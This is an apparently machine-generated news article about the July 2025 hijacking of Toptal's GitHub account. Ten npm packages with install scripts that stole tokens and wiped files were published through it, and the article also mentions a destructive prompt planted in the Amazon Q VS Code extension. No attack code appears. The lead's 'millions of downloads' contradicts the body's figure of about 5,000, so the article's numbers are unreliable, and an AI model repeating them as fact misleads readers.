Ethical Hacking News
Hackers have published 10 malicious npm packages through Toptal's GitHub account, compromising millions of downloads and raising concerns over the security of open-source software. The attack highlights the ongoing trend of bad actors abusing trust in open-source communities to slip malware into developer workflows.
Hackers compromised Toptal's GitHub organization account and published 10 malicious packages to the npm registry. The attack used a software supply chain attack, exploiting vulnerabilities in open-source ecosystems to publish malicious software. The affected packages contained code designed to exfiltrate GitHub authentication tokens and destroy victim systems. The attack is believed to have been carried out by a group of hackers who used credential compromise or rogue insiders with access to Toptal's GitHub organization. The incident highlights the ongoing trend of bad actors abusing open-source ecosystems to slip malware and spyware into developer workflows.
In a recent incident that has sent shockwaves through the cybersecurity community, hackers have managed to compromise Toptal's GitHub organization account and published 10 malicious packages to the npm registry. The affected packages contained code designed to exfiltrate GitHub authentication tokens and destroy victim systems, with some of them attracting over 5,000 downloads before they were removed from the repository.
The attack is the latest instance of a software supply chain attack, where unknown threat actors exploited vulnerabilities in open-source ecosystems to publish malicious software. This type of attack has become increasingly common in recent years, as bad actors seek to abuse trust in open-source communities to slip malware and spyware into developer workflows.
The compromised packages were all embedded with identical payloads in their package.json files, which allowed them to exfiltrate GitHub authentication tokens to a webhook endpoint and then silently remove all directories and files without requiring any user interaction on both Windows and Linux systems. The malicious code was designed to specifically target the preinstall and postinstall scripts, making it difficult for developers to detect.
The attack is believed to have been carried out by a group of hackers who used credential compromise or rogue insiders with access to Toptal's GitHub organization to gain unauthorized access to the accounts. Despite their efforts, however, it remains unclear how the initial compromise occurred, and researchers are still investigating the matter.
This incident highlights the ongoing trend of bad actors abusing open-source ecosystems to slip malware and spyware into developer workflows. The attack also coincides with another supply chain attack that targeted both npm and the Python Package Index (PyPI) repositories, which used surveillanceware capable of infecting developer machines with malware that could log keystrokes, capture screens and webcam images, gather system information, and steal credentials.
The identified packages are below:
- @toptal/picasso-tailwind
- @toptal/picasso-charts
- @toptal/picasso-shared
- @toptal/picasso-provider
- @toptal/picasso-select
- @toptal/picasso-quote
- @toptal/picasso-forms
- @xene/core
- @toptal/picasso-utils
- @toptal/picasso-typograph
The list of affected packages is quite extensive, and it's clear that the attackers had access to a significant amount of code. The attack also resulted in 73 repositories associated with the organization being made public.
In addition to the npm registry incident, this attack follows another recent compromise of Amazon Q extension for Visual Studio Code (VS Code) to include a "defective" prompt to erase the user's home directory and delete all their AWS resources. Rogue hackers submitted a pull request under the alias "lkmanka58" that was accepted despite containing malicious commands.
The hacker behind the attack, who went by the name "ghost," claimed they wanted to expose Amazon's "illusion of security and lies." The company has since removed the malicious version and released an updated version (1.85) of the extension.
Experts emphasize the need for developers to be cautious when using open-source packages and to thoroughly verify their sources before incorporating them into their projects. They also stress the importance of keeping software up-to-date with the latest security patches to prevent exploitation of known vulnerabilities.
This incident serves as a stark reminder of the ongoing risks associated with software supply chain attacks and the need for cybersecurity awareness among developers. As the use of open-source packages continues to grow, it's essential that developers prioritize their security by being vigilant about potential threats in these ecosystems.
Related Information:
https://www.ethicalhackingnews.com/articles/Hackers-Expose-Vulnerability-in-Open-Source-Ecosystems-A-Growing-Concern-for-Cybersecurity-ehn.shtml
https://thehackernews.com/2025/07/hackers-breach-toptal-github-publish-10.html
Published: Tue Jul 29 01:24:29 2025 by llama3.2 3B Q4_K_M
